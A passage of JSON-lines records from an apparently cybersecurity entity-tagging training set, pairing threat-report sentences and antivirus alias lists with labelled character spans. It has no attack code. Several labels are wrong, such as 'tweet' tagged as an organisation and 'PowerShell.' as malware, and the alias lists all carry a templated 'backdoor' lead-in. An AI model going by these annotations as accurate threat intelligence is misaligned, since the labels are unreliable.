{"id": "cyner2_train_006222", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAuto.5860 Backdoor.Lesbot.152 Backdoor.Lesbot.152.n2 Trojan.Win32.Lesbot.djep Win32/Lesbot.B WORM_NETSPREE.A Backdoor.Win32.Lesbot.152 Backdoor.Lesbot.152 Backdoor.Leeter.B Worm.Win32.Netspree Worm.Win32.Netspree.A Backdoor.Lesbot.152 Win32.IRC.Bot.based WORM_NETSPREE.A Backdoor/Lesbot.152 Bck/Lesbot.152 Win32.Hack.Lesbot.kcloud Backdoor.Lesbot.152 W32/Risk.OZRI-5730 Win32/Netspree.worm.48448 
Win32/Netspree.A Backdoor.Lesbot.152.a Backdoor.Win32.Lesbot.152 W32/Lesbot.152!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006224", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Spy/W32.AutoHK.877056 TrojanSpy.AutoHK W32/Trojan.FIJU-8952 Trojan-Spy.Win32.AutoHK.b Trojan.Win32.Z.Autohk.877056.A Win32.Trojan-spy.Autohk.Anzi TrojWare.Win32.Hadoc.AS BehavesLike.Win32.Dropper.ch PUA.EnigmaProtector TrojanSpy.AutoHK.a Trojan:Win32/Haudicx.A!bit Troj.Spy.W32!c Trojan-Spy.Win32.AutoHK.b Trojan/Win32.Asprox.R130565 TrojanSpy.AutoHK Win32/Spy.AHK.E", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006225", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Cantone.Trojan Win32.Worm.TTE Worm.Win32.Zombaque!O Worm.Ppzombie.A3 Worm.Zombaque.Win32.16 Win32.Worm.TTE WORM_BIZOME.SMF W32/Risk.KAIL-2278 W32.Spybot.Worm Win32/Zombaque.B WORM_BIZOME.SMF Win.Worm.Bizome-4 Worm.Zombaque Worm.Win32.Zombaque.h Trojan.Win32.Zombaque.igegn Trojan.Win32.P2P-Icmp.437760 Win32.HLLW.RAhack.2 BehavesLike.Win32.Downloader.gc Worm.Win32.Zombaque W32/Zombaque.A Worm/Zombaque.k Win32.Virut.cr.61440 Worm:Win32/Ppzombie.A Win32.Worm.TTE Worm.Win32.Zombaque.h Worm/Win32.Zombaque.R15854 Win32.Worm.TTE Win32.Worm.TTE Win32/Zombaque.B Virus.Win32.Virut.ue Worm.Zombaque!1mLwNArV7Hg", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006226", "source": "cyner2_train"}} {"text": "The first in-the-wild UEFI bootkit bypassing UEFI Secure Boot on fully updated UEFI systems is now a reality.", "spans": {"MALWARE: UEFI bootkit": [[22, 34]], "VULNERABILITY: bypassing": [[35, 44]], "SYSTEM: UEFI Secure Boot": [[45, 61]], "SYSTEM: UEFI systems": [[79, 91]]}, "info": {"id": "cyner2_train_006228", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Ceeinject.6879 PWS-Spyeye.cr Trojan/PornoAsset.avl TROJ_KRYPTO.SMOZ Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32/Ransom.AQY 
TROJ_KRYPTO.SMOZ Win.Trojan.Ransom-1156 Trojan.Win32.A.PornoAsset.43521 Trojan.Winlock.3300 PWS-Spyeye.cr Trojan/PornoAsset.nh TR/Winlock.CR Trojan[Backdoor]/Win32.Buterat Trojan.Barys.D8A2 Ransom:Win32/Trasbind.A Trojan/Win32.Tdss.R14197 Hoax.PornoAsset Trojan.Win32.Jorik", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006230", "source": "cyner2_train"}} {"text": "On the 9th of August, a tweet from @MalwareHunterTeam caught my eye; it mentioned a fake Flash update that used a PowerShell script to connect to a very particular host", "spans": {"ORGANIZATION: tweet": [[24, 29]], "ORGANIZATION: @MalwareHunterTeam": [[35, 53]]}, "info": {"id": "cyner2_train_006231", "source": "cyner2_train"}} {"text": "Nemesis, the malware ecosystem used by FIN1, includes comprehensive backdoors that support a variety of network protocols and communication channels for command and control CnC.", "spans": {"MALWARE: Nemesis,": [[0, 8]], "MALWARE: malware ecosystem": [[13, 30]], "THREAT_ACTOR: FIN1,": [[39, 44]], "MALWARE: backdoors": [[68, 77]]}, "info": {"id": "cyner2_train_006233", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsOval.152A Backdoor.Win32.VB!O Backdoor.VB.MV3 Trojan.Llac.Win32.24709 Trojan/Injector.eih BKDR_RSHOT.SMA Win32.Backdoor.VB.y BKDR_RSHOT.SMA Win.Trojan.6387874-3 Trojan.Win32.Temr.ssc Trojan.Win32.Temr.ejiehl Backdoor.W32.Ciadoor.lo5L TrojWare.Win32.Qhost.nls Trojan.DownLoader16.56820 Backdoor.Win32.VB BehavesLike.Win32.Trojan.tc Trojan.Temr.ak Backdoor:Win32/Lybsus.A Trojan.Graftor.D4305 Backdoor.Win32.A.VB.168034 Trojan.Win32.Temr.ssc Backdoor.Win32.VB Backdoor.VB Trojan.Injector!pDYfo+3Pf04 Trojan-Spy.Win32.KeyLogger W32/DarkKomet.GUKH!tr Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006234", "source": "cyner2_train"}} {"text": "Technical details Here is the meta information for the observed samples , certificates and hardcoded version stamps : Certificate MD5 Module Version 
Serial Number : 0x76607c02 Issuer : CN=Ron Validity : from = Tue Aug 30 13:01:30 MSK 2016 to = Sat Aug 24 13:01:30 MSK 2041 Subject : CN=Ron 9e005144ea1a583531f86663a5f14607 1 – 18abe28730c53de6d9e4786c7765c3d8 2 2.0 Serial Number : 0x6a0d1fec Issuer : CN=Sun Validity : from = Mon May 16 17:42:40 MSK 2016 to = Fri May 10 17:42:40 MSK 2041 Subject : CN=Sun 9ffc350ef94ef840728564846f2802b0 2 v2.51sun 6c246bbb40b7c6e75c60a55c0da9e2f2 2 v2.96s 7c8a12e56e3e03938788b26b84b80bd6 2 v3.09s bde7847487125084f9e03f2b6b05adc3 2 v3.12s 2560942bb50ee6e6f55afc495d238a12 2 v3.18s It ’ s interesting that the issuer “ Sun ” matches the “ Sun1 ” and “ Sun2 ” identifiers of infected devices from the FTP server , suggesting they may be test devices .", "spans": {}, "info": {"id": "cyner2_train_006236", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Masteseq Win32.Trojan.WisdomEyes.16070401.9500.9872 Backdoor.Masteseq Trojan.Win32.Masteseq.evvgyd Backdoor.W32.Masteseq!c BackDoor.Liskey Backdoor.Masteseq.x Backdoor:Win32/Masteseq.AC Trojan/Win32.Masteseq.R12342 Trj/GdSda.A Win32.Backdoor.Masteseq.Lpbn Backdoor.Win32.Masteseq Win32/Trojan.d37", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006238", "source": "cyner2_train"}} {"text": "Cisco Talos is currently observing a widespread campaign leveraging the Samas/Samsam/MSIL.B/C ransomware variant.", "spans": {"ORGANIZATION: Cisco Talos": [[0, 11]], "THREAT_ACTOR: campaign": [[48, 56]], "MALWARE: ransomware variant.": [[94, 113]]}, "info": {"id": "cyner2_train_006239", "source": "cyner2_train"}} {"text": "Last March 2016, we noted that PowerWare crypto-ransomware also abused PowerShell.", "spans": {"MALWARE: PowerWare crypto-ransomware": [[31, 58]], "MALWARE: PowerShell.": [[71, 82]]}, "info": {"id": "cyner2_train_006240", "source": "cyner2_train"}} {"text": "What makes this botnet successful is its highly configurable and modular design that can fit any malicious intent, like distributing 
Zeus or, more recently, distributing a Lethic bot.", "spans": {"MALWARE: botnet": [[16, 22]], "MALWARE: Zeus": [[133, 137]], "MALWARE: Lethic bot.": [[172, 183]]}, "info": {"id": "cyner2_train_006242", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Exploit.WordPerf.B Trojan/Exploit.WordPerf.b TROJ_WORDPERF.B W32/Risk.DAAG-1937 Win32/Exploit.WordPerf.B TROJ_WORDPERF.B Win.Trojan.Exploit-204 Exploit.Win32.WordPerf.b Trojan.Exploit.WordPerf.B Exploit.Win32.WordPerf.gpac Exploit.W32.WordPerf.b!c Trojan.Exploit.WordPerf.B TrojWare.Win32.Exploit.WordPerf.B Trojan.Exploit.WordPerf.B Exploit.Qaaz Exploit.WordPerf.Win32.2 Exploit.WordPerf.b TR/Expl.WordPerf.B Trojan[Exploit]/Win32.WordPerf Win32.EXPLOIT.WordPerf.b.kcloud Exploit:Win32/WordPerf.B Trojan.Exploit.WordPerf.B Exploit.Win32.WordPerf.b Trojan.Exploit.WordPerf.B Trojan.Exploit.WordPerf.B Win32.Exploit.Wordperf.Wxrv Exploit.WordPerf!zPzGZ0A1+Q4 Trojan.Win32.Exploit W32/WordPerf.B!exploit Win32/Trojan.827", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006243", "source": "cyner2_train"}} {"text": "Rokku seems to be distributed by a malicious document, which contains a macro that when is executed downloads and runs Rokku.", "spans": {"MALWARE: Rokku": [[0, 5]], "MALWARE: macro": [[72, 77]], "MALWARE: Rokku.": [[119, 125]]}, "info": {"id": "cyner2_train_006246", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Vetor.PE Virus.Win32.Virut.1!O W32.Virut.G PE_VIRUX.O W32.Virut.CF Win32/Virut.17408 PE_VIRUX.O Win32.Virus.Virut.Q Virus.Win32.Virut.ce Virus.Win32.Virut.hpeg W32.Virut.mzNk Win32.Virut.56 Virus.Virut.Win32.1938 Win32/Virut.bt Virus/Win32.Virut.ce Win32.Virut.cr.61440 TrojanDownloader:MSIL/Tackerkin.A Virus.Win32.Virut.ce Win32/Virut.F Virus.Virut.14 W32/Sality.AO Win32/Virut.NBP Trojan-Downloader.MSIL W32/Virut.CE Virus.Win32.VirutChangeEntry.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006248", "source": 
"cyner2_train"}} {"text": "A backdoor also known as: Ransom.Ryzerlo.A3 Trojan.Ransom.HiddenTears.1 Ransom_BLOCCATO.SM Ransom.HiddenTear Ransom_BLOCCATO.SM MSIL.Trojan-Ransom.Cryptear.B Trojan.Win32.Filecoder.ethwkz Trojan.Win32.Z.Ransom.211968.EF TrojWare.MSIL.Ransom.Ryzerlo.A Trojan.Encoder.10598 Trojan-Ransom.HiddenTear TR/ATRAPS.jnrzk Ransom.HiddenTear/Variant Trojan.Ransom.HiddenTear Trj/GdSda.A MSIL/Filecoder.Y!tr Win32/Trojan.61e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006252", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Clod232.Trojan.380a Heur.Win32.Veebee.1!O TrojanSpy.VB!WEMPyAgOnlg W32/MalwareF.ZFHU Trojan-Spy.Win32.VB.dwb Trojan.Win32.VB.cpxay Trojan.Win32.A.VB.77932 TrojWare.Win32.TrojanSpy.VB.NNW Trojan.DownLoader1.62643 Trojan[Spy]/Win32.VB PWS:Win32/Gypthoy.A W32/Risk.FBWB-6710 Trojan.VBRA.02824 Trojan-Spy.Win32.VB W32/VB.DWB!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006254", "source": "cyner2_train"}} {"text": "The attack was found to heavily rely on RTF exploits and at the time, thought to make use of the PlugX malware family.", "spans": {"VULNERABILITY: RTF exploits": [[40, 52]], "MALWARE: PlugX malware family.": [[97, 118]]}, "info": {"id": "cyner2_train_006255", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Vetor.PE Backdoor.Bot.97496 W32.Virut.D Backdoor.Bot.97496 Virus.LdPinch.Win32.1 W32/Virut.F Backdoor.Bot.D17CD8 Win32.Virus.Virut.i W32/Sdbot.ACIH W32.IRCBot PE_VIRUT.D-1 Win.Trojan.Virut-16 Backdoor.Bot.97496 Virus.Win32.Virut.n Backdoor.Bot.97496 Virus.Win32.Virut.jxol Backdoor.Win32.A.IRCBot.97792 Virus.W32.Virut!c Backdoor.Bot.97496 PE_VIRUT.D-1 BehavesLike.Win32.Virut.pc Worm.Win32.Kulsibot W32/Sdbot.OGIG-1311 Win32/Virut.e Virus/Win32.Virut.n Win32.Virut.n.2600 Worm:Win32/Kulsibot.A Virus.Win32.Virut.n Win32/Virut.D Win32/Virut.E Virus.Win32.HanKu.e Virus.Win32.Virut.AT", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": 
{"id": "cyner2_train_006257", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.BypauTH.Trojan Application.Hacktool.Vncpass.A Trojan-Spy/W32.Vnc.32768 NetTool.Win32.VNC!O Tool.VNC.Win32.1 Win32.Trojan.WisdomEyes.16070401.9500.9990 W32/Tool.PPKE-1202 Backdoor.Prorat Application.Hacktool.Vncpass.A not-a-virus:NetTool.Win32.VNC.a Application.Hacktool.Vncpass.A Riskware.Win32.VNC.hsfc Application.Hacktool.Vncpass.A ApplicUnsaf.Win32.NetTool.VNC.A Application.Hacktool.Vncpass Tool.VncBypauth not-a-virus:NetTool.Win32.VNC W32/HackTool.CDN NetTool.VNC.b HackTool[NetTool]/Win32.VNC Application.Hacktool.Vncpass.A not-a-virus:NetTool.Win32.VNC.a Win-AppCare/Vnc.32768 HackTool.VNC!Pb5Dm1ZMh30 Win32/Virus.NetTool.8e7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006259", "source": "cyner2_train"}} {"text": "US defense contractors were only fairly recent targets based on the operation's history, which we traced to spear-phishing in 2010.", "spans": {"ORGANIZATION: US defense contractors": [[0, 22]], "THREAT_ACTOR: operation's": [[68, 79]]}, "info": {"id": "cyner2_train_006260", "source": "cyner2_train"}} {"text": "By now, most of the malware researchers are used to seeing drive-by infections that serve up a handful of malware, from droppers to payloads.", "spans": {"ORGANIZATION: malware researchers": [[20, 39]], "MALWARE: droppers": [[120, 128]], "MALWARE: payloads.": [[132, 141]]}, "info": {"id": "cyner2_train_006263", "source": "cyner2_train"}} {"text": "However, global security companies are limited in collecting attack information in Korea, and there is also a lack of information about the attacks that Lazarus or Lazarus are suspected of as a small group of threat groups in Korea.", "spans": {"ORGANIZATION: global security companies": [[9, 34]], "THREAT_ACTOR: Lazarus": [[153, 160], [164, 171]], "THREAT_ACTOR: a small group of threat groups": [[192, 222]]}, "info": {"id": "cyner2_train_006266", "source": "cyner2_train"}} 
{"text": "But SamSam isn't the only ransomware out there charging eye-watering amounts to decrypt business servers.", "spans": {"MALWARE: SamSam": [[4, 10]], "MALWARE: ransomware": [[26, 36]], "SYSTEM: decrypt business servers.": [[80, 105]]}, "info": {"id": "cyner2_train_006271", "source": "cyner2_train"}} {"text": "This variant uses a new UAC bypass method that has been used by the Dridex malware since December, 2014.", "spans": {"MALWARE: Dridex malware": [[68, 82]]}, "info": {"id": "cyner2_train_006272", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9882 Backdoor.Teambot Trojan.Win32.Kazy.cxkslh Trojan.PWS.Spy.19585 Trojan.Kazy.D1E900 Backdoor:Win32/Pavica.B!dll Backdoor/Win32.Pavica.R161181", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006273", "source": "cyner2_train"}} {"text": "It also drops decoy documents in an attempt to camouflage the attack.", "spans": {}, "info": {"id": "cyner2_train_006276", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9821 BehavesLike.Win32.Trojan.tc Trojan/Win32.MSILKrypt.C2372735", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006278", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9890 Backdoor.Win32.Ruledor.c BackDoor.Ruller Downloader.Adload.Win32.15034 BehavesLike.Win32.Sural.tc Trojan[Backdoor]/Win32.Ruledor Backdoor:Win32/Ruledor.B Backdoor.Win32.Ruledor.c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006282", "source": "cyner2_train"}} {"text": "They evade detection by keeping their code simple and flying under the radar.", "spans": {}, "info": {"id": "cyner2_train_006283", "source": "cyner2_train"}} {"text": "We speculate that other attacks delivering Bookworm were also targeting organizations in Thailand based on the contents of the associated decoys documents, as well as several 
of the dynamic DNS domain names used to host C2 servers that contain the words Thai or Thailand", "spans": {"MALWARE: Bookworm": [[43, 51]], "ORGANIZATION: targeting organizations": [[62, 85]]}, "info": {"id": "cyner2_train_006284", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Autoit.ARV Worm.AutoIt.Helompy.A Trojan.Autoit.ARV Worm.AutoRun.Win32.33975 Win32.Trojan.AutoIt.a W32/Trojan2.MFAR W32.SillyDC Win.Trojan.Autoit-1267 Worm.Win32.AutoIt.agm Trojan.Autoit.ARV Trojan.Win32.Napad.ijfyd Worm.Win32.A.IM-Sohanad.278196 Win32.HLLW.Napad BehavesLike.Win32.YahLover.hc W32/Trojan.MASJ-0546 Worm/AutoRun.sfx Worm:Win32/Helompy.A Trojan.Autoit.ARV Worm.Win32.AutoIt.agm HEUR/Fakon.mwf Trojan.Autoit.ARV Trj/CI.A I-Worm.Autoit.GP Worm.Win32.Autorun.aao Win32/Trojan.e4c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006286", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.ArchSMS Win32.Trojan.WisdomEyes.16070401.9500.9977 Hoax.Win32.ArchSMS.upa Win32.Trojan-psw.Archsms.Pgnh Trojan.Fraudster.307 Trojan:Win32/MobicArch.A Hoax.Win32.ArchSMS.upa Win32.Trojan.ArchSMS.D Spyware/Win32.ArchSMS.R32549 Hoax.ArchSMS.ge Hoax.Win32.ArchSMS Win32/Trojan.b8b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006288", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Pokey.A Trojan.Pokey.A Trojan.Pokey.A WORM_PIKACHU.A W32/Trojan.GNFD-9297 W32.Pokey.Worm Win32/Pikachu.32768 WORM_PIKACHU.A Win.Worm.Pikachu-2 Trojan.Pokey.A Email-Worm.Win32.Pikachu Trojan.Pokey.A Trojan.Win32.Pikachu.enlz I-Worm.Win32.Pikachu Trojan.Pokey.A Worm.Win32.Pikachu.A Trojan.Pokey.A Worm.Pikachu.Win32.2 Pokey.a Email-Worm.Win32.Pikachu W32/Trojan2.CSH Worm:Win32/Pokey.A@mm WORM/Pikachu.AuExec Worm[Email]/Win32.Pikachu Worm:Win32/Pokey.A@mm Worm.Pokey Email-Worm.Win32.Pikachu Pokey.a Email-Worm.Pikachu Win32/Pikachu.A I-Worm.Pikachu W32/Pikachu.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": 
{"id": "cyner2_train_006289", "source": "cyner2_train"}} {"text": "Derusbi has been widely covered and associated with Chinese threat actors.", "spans": {"MALWARE: Derusbi": [[0, 7]], "THREAT_ACTOR: Chinese threat actors.": [[52, 74]]}, "info": {"id": "cyner2_train_006290", "source": "cyner2_train"}} {"text": "The macro will download ransomware or banking malware after execution. JavaScript files, executed by Wscript in Windows, dropping, for example, Locky ransomware.", "spans": {"MALWARE: macro": [[4, 9]], "MALWARE: ransomware": [[24, 34]], "MALWARE: banking malware": [[38, 53]], "SYSTEM: Windows,": [[112, 120]], "MALWARE: Locky ransomware.": [[144, 161]]}, "info": {"id": "cyner2_train_006292", "source": "cyner2_train"}} {"text": "OceanLotus, also known as APT32, is believed to be a Vietnam-based APT group that has become increasingly sophisticated in its attack tactics, techniques, and procedures TTPs.", "spans": {"THREAT_ACTOR: OceanLotus,": [[0, 11]], "THREAT_ACTOR: APT32,": [[26, 32]], "THREAT_ACTOR: a Vietnam-based APT group": [[51, 76]]}, "info": {"id": "cyner2_train_006295", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Worm.SoulClose.E Worm.Win32.VB!O W32.Vb.RC Win32.Worm.SoulClose.E W32/VB.rc Win32.Worm.SoulClose.E PE_SOULOPEN.A Win32.Worm.VB.bc W32/Worm.EGII-1744 W32.Fujacks.C Win32/NoelOpus.B PE_SOULOPEN.A Win.Worm.VB-5176 Win32.Worm.SoulClose.E Worm.Win32.VB.rc Win32.Worm.SoulClose.E Trojan.Win32.VB.ooto Worm.Win32.A.VB.66048.A[UPX] Worm.W32.Vb!c Win32.Worm.SoulClose.E Virus.Win32.VB.~A Win32.Worm.SoulClose.E Win32.HLLW.Autoruner.2173 BehavesLike.Win32.Dropper.tm W32/Worm.VIF Worm/VB.pcu TR/VB.dek.1 Worm/Win32.VB Worm.VB.rc.kcloud Worm:Win32/Soulclose.A Worm.Win32.VB.rc Trojan/Win32.HDC.C146348 W32/HLLP.Soul.a Worm.VB Win32/AutoRun.VB.HG Win32.Worm.Vb.Eex Worm.Soulclose!T6Z53ODblJg Virus.Worm.Win32.VB W32/VB.MJU!tr Virus.Win32.VBViking.I", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006296", "source": 
"cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Way Backdoor.Way.Win32.124 W32/Backdoor.HAT Backdoor.Trojan Win32/FakeMS.WOCR Win.Trojan.Dealply-6391261-0 Backdoor.Win32.Way.10 Trojan.Win32.Way.wibi Trojan.Win32.Z.Way.314010 Backdoor.W32.Way!c BackDoor.Way.10 Backdoor.Win32.Way W32/Backdoor.EORF-5693 Backdoor/NetStar.10 Trojan[Backdoor]/Win32.Way Backdoor.Win32.Way.10 Win32.Backdoor.Way.Dztb Backdoor.Way!jjTH+E6uXaw W32/Way.A!tr Win32/Backdoor.008", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006298", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Sirefef.A Backdoor/ZAccess.trq Win32.Trojan.WisdomEyes.16070401.9500.9982 TROJ_SIREFEF.SM Trojan.Win32.ZAccess.tiikz Backdoor.Win32.A.ZAccess.190464.AD Backdoor.Win32.ZAccess.TZS BackDoor.Maxplus.5433 Trojan.FakeAV.Win32.243037 TROJ_SIREFEF.SM BehavesLike.Win32.ZeroAccess.cc Trojan.Win32.Sirefef Backdoor/ZAccess.dbk Trojan[Backdoor]/Win32.ZAccess Trojan:Win32/Sirefef.P Trojan.Kazy.D1335F Backdoor/Win32.ZAccess.R28242 ZeroAccess.ex BScope.Backdoor.Maxplus.2613 Rootkit.0Access", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006299", "source": "cyner2_train"}} {"text": "A backdoor also known as: Android.Leech.I HEUR:Trojan-Dropper.AndroidOS.Leech.c Android.Packed.5 ZIP/Trojan.PXTI-7 SPR/ANDR.Jiagu.zhye Troj.Dropper.Androidos!c HEUR:Trojan-Dropper.AndroidOS.Leech.c PUA.AndroidOS.MoneyReward", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006300", "source": "cyner2_train"}} {"text": "When reversing malware samples, one of the things that we as analysts look for are places where the attackers slip up.", "spans": {"MALWARE: malware": [[15, 22]], "MALWARE: attackers": [[100, 109]]}, "info": {"id": "cyner2_train_006301", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Packed.EZip.a Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_BIFROS.SMI Win.Trojan.Mybot-4352 Trojan.Win32.139069.ebchy 
Backdoor.Win32.Rbot.~d5 TROJ_BIFROS.SMI Trojan/Win32.Unknown Trojan.ManBat.1 Troj.W32.Refroso.lnM8 TrojanDropper:Win32/Bifrose.F Trojan.Win32.Rbot", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006302", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Qhosts Virus.W32.Specx.B!c Heur.Corrupt.PE Trojan[Backdoor]/Win32.IRCBot Worm:Win32/Specx.C.dam#2 Trj/CI.A Worm.Win32.Specx Win32/Trojan.bba", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006303", "source": "cyner2_train"}} {"text": "After analysis, it was confirmed that the sample belonged to the discovered botnet family Kaiji.", "spans": {"MALWARE: botnet family Kaiji.": [[76, 96]]}, "info": {"id": "cyner2_train_006304", "source": "cyner2_train"}} {"text": "The spam e-mails are enticing users by impersonating well known companies, using their logos and known subject lines to further sell the deception.", "spans": {}, "info": {"id": "cyner2_train_006309", "source": "cyner2_train"}} {"text": "The Blogspot page contained a javascript window location that redirected the visitor to a second URL hosted on a dedicated server.", "spans": {"ORGANIZATION: visitor": [[77, 84]], "SYSTEM: a dedicated server.": [[111, 130]]}, "info": {"id": "cyner2_train_006311", "source": "cyner2_train"}} {"text": "In this campaign, it mainly tries to steal Firefox and other credentials.", "spans": {"THREAT_ACTOR: campaign,": [[8, 17]], "SYSTEM: Firefox": [[43, 50]]}, "info": {"id": "cyner2_train_006312", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9900 Win.Spyware.Banker-4198 not-a-virus:HEUR:RiskTool.Win32.BitCoinMiner.heur Trojan.Winlock.5377 BehavesLike.Win32.Kespo.cc Troj.W32.Delf.l4mb not-a-virus:HEUR:RiskTool.Win32.BitCoinMiner.heur Trojan:Win32/Comine.A Trojan-Downloader.Win32.Banload", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006313", "source": "cyner2_train"}} {"text": "A 
backdoor also known as: Trojan.Kryptik.Win32.1331272 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Kryptik.ewfvwr Trojan.DownLoader24.52368 BehavesLike.Win32.Trojan.jz Trj/GdSda.A Trojan.MSIL.Crypt", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006314", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Razy.DAD41 Win32.Trojan.WisdomEyes.16070401.9500.9993 PUA.Downloader Trojan.Win32.AVKill.dciepf Trojan.AVKill.30546 TR/Kryptik.clfug Trojan:MSIL/Krolol.A Win32/Trojan.b49", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006315", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Cloda53.Trojan.5b54 W32/Delf.g W32/SillyWorm.CE W32.Miliam@mm Win.Worm.Minima-1 Email-Worm.Win32.Delf.g Trojan.Win32.Delf.gmcr W32.W.Delf.g!c Worm.Win32.Delf.g Worm.Delf.Win32.349 BehavesLike.Win32.Downloader.lc W32/Worm.NVHR-2426 I-Worm/Delf.ls WORM/Atak.L W32/Delf.G@mm Worm[Email]/Win32.Delf Worm/Win32.Xema.N403133190 Worm:Win32/Miliam.A@mm Worm.Delf Win32.Worm-email.Delf.Ebqb Email-Worm.Win32.Delf I-Worm/Delf.X", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006316", "source": "cyner2_train"}} {"text": "A backdoor also known as: Softwarebundler.Wizrem.FC.2316 Win32.Trojan.WisdomEyes.16070401.9500.9991 Trojan.Win32.Z.Revirdit.463872 Backdoor:MSIL/Revirdit.A Trojan.MSILPerseus.D1F0A1 Trj/GdSda.A Win32/Trojan.ed9", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006318", "source": "cyner2_train"}} {"text": "During a recent compromise assessment, Cylance incident responders and threat researchers uncovered a surreptitious and sophisticated remote access trojan RAT that had been planted and operated by the suspected threat actor.", "spans": {"ORGANIZATION: Cylance incident responders": [[39, 66]], "ORGANIZATION: threat researchers": [[71, 89]], "MALWARE: remote access trojan RAT": [[134, 158]], "THREAT_ACTOR: the suspected threat actor.": [[197, 
224]]}, "info": {"id": "cyner2_train_006322", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32/Trojan.DPQH-6594 Win32/Tnega.aTYcGTB Trojan.Win32.Small.cjn Troj.W32.Small!c TR/Jord.dvwus Trojan:Win32/Mvpaten.A Trojan.Win32.Small.cjn Win32.Trojan.Small.Llqr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006323", "source": "cyner2_train"}} {"text": "Targets included a wide array of high-profile entities, including intelligence services, military, utility providers telecommunications and power, embassies, and government institutions.", "spans": {"ORGANIZATION: high-profile entities,": [[33, 55]], "ORGANIZATION: intelligence services, military, utility providers telecommunications and power, embassies,": [[66, 157]], "ORGANIZATION: government institutions.": [[162, 186]]}, "info": {"id": "cyner2_train_006326", "source": "cyner2_train"}} {"text": "Curiously, the Word document does not contain any macros, or even an exploit.", "spans": {"MALWARE: exploit.": [[69, 77]]}, "info": {"id": "cyner2_train_006330", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Netsky.T@mm.Damaged Damage.Small W32/Netsky.t@MM W32/Netsky.T@MM I-Worm.Netsky.FJ Netsky.T@mm WORM_NSKY.DAM Win32.NetSky.t Email-Worm.Win32.NetSky.t Email-Worm.Win32.NetSky!IK Heur.Corrupt.PE Win32.HLLM.Netsky.18432 Worm/Netsky.#1 WORM_NSKY.DAM W32/Netsky.t@MM I-Worm/NetSky.u Worm:Win32/Netsky.CY@mm.dam#4 Email-Worm.Win32.NetSky.t Worm.Mail.Win32.NetSky.daq Email-Worm.Win32.NetSky W32/Netsky.T@mm W32/Netsky.T.worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006333", "source": "cyner2_train"}} {"text": "And finally it's important to highlight that the RAT itself is not new.", "spans": {}, "info": {"id": "cyner2_train_006334", "source": "cyner2_train"}} {"text": 